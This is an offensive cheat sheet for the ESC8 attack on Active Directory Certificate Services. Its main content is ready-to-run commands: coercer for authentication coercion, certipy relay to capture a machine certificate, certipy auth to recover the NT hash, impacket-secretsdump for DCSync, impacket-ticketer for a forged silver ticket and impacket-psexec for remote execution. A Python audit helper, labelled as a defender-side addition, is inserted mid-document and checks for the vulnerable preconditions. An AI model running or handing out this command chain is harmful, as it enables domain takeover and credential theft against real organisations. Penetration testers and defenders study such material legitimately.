ESC8
Authentication coercion against a machine account, relaying the captured NTLM authentication to the AD CS web enrollment endpoint to obtain a certificate that lets us authenticate as that account.
Requirements
- A vulnerable web enrollment endpoint.
- At least one certificate template published that allows for domain computer enrollment and client authentication.
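As an added defender-side example (not part of the original cheat sheet), the two requirements above expressed as an audit over an inventory the defender already holds; the dataclass names and fields are assumptions, the sample values in the comments are constructed, and the EKU OIDs are the standard ones.

```python
"""Added audit helper: checks the two ESC8 preconditions against a supplied inventory."""
from dataclasses import dataclass

# EKU OIDs that permit client/logon authentication (an empty EKU set means any purpose).
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Principals whose Enroll right lets a domain computer account request the template.
MACHINE_ENROLLERS = {"Domain Computers", "Authenticated Users", "Everyone"}

@dataclass(frozen=True)
class WebEnrollment:           # assumed shape; e.g. url="http://ca01/certsrv/" (constructed)
    url: str
    auth_methods: frozenset    # HTTP auth schemes offered, e.g. {"NTLM", "Negotiate"}
    epa_enabled: bool          # Extended Protection for Authentication (channel binding)

@dataclass(frozen=True)
class Template:                # assumed shape
    name: str
    published: bool
    enrollers: frozenset       # principals holding the Enroll right
    ekus: frozenset            # EKU OIDs; empty means any purpose

def endpoint_is_relayable(ep: WebEnrollment) -> bool:
    """NTLM can be relayed unless the endpoint is Kerberos-only or HTTPS with EPA."""
    if not ({"NTLM", "Negotiate"} & ep.auth_methods):
        return False           # Negotiate can fall back to NTLM, so it still counts
    if ep.url.lower().startswith("https://") and ep.epa_enabled:
        return False
    return True

def template_enables_machine_logon(t: Template) -> bool:
    """Published, enrollable by computer accounts, and usable for client authentication."""
    enrollable = bool(t.enrollers & MACHINE_ENROLLERS)
    client_auth = not t.ekus or bool(t.ekus & CLIENT_AUTH_EKUS)
    return t.published and enrollable and client_auth

def audit_esc8(ep: WebEnrollment, templates: list) -> dict:
    """Both preconditions must hold; lists the templates that satisfy the second one."""
    risky = sorted(t.name for t in templates if template_enables_machine_logon(t))
    relayable = endpoint_is_relayable(ep)
    return {"relayable_endpoint": relayable,
            "machine_logon_templates": risky,
            "esc8_exposed": relayable and bool(risky)}
```

The mitigation follows from whichever precondition the audit flags: Kerberos-only or HTTPS with EPA on the endpoint, and removing computer-account enrollment or the client-authentication EKU from the listed templates.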
Linux
Certipy relay
bob$ certipy relay -target <adcs_ip> -template <machine_template>
Performing Authentication Coercion (in another terminal)
bob$ coercer coerce -l <your_ip> -t <adcs_ip> -u user1@minions.com -p 'password1' -d minions.com -v
This yields the certificate and private key of the coerced machine account, saved as a .pfx file.
Request a TGT as the Machine Computer (or the Domain Controller)
bob$ certipy auth -pfx machine_account.pfx
This yields the account's NT hash, which we can use to authenticate.
Depending on the situation, two attacks are now possible:
DCSync (if we have domain admin permissions)
DCSync using the NT Hash as the Domain Controller
bob$ impacket-secretsdump 'dc01$@minions.com' -hashes <nt_hash>
Silver Ticket (using a specific Machine Account's NT hash)
Forge a Silver Ticket
bob$ impacket-ticketer -nthash <nt_hash> -domain-sid <domain_sid> -domain minions.com -spn <spn> Administrator
Perform a Pass-the-Ticket attack with PsExec
bob$ export KRB5CCNAME=Administrator.ccache
bob$ impacket-psexec -k -no-pass target-pc.minions.com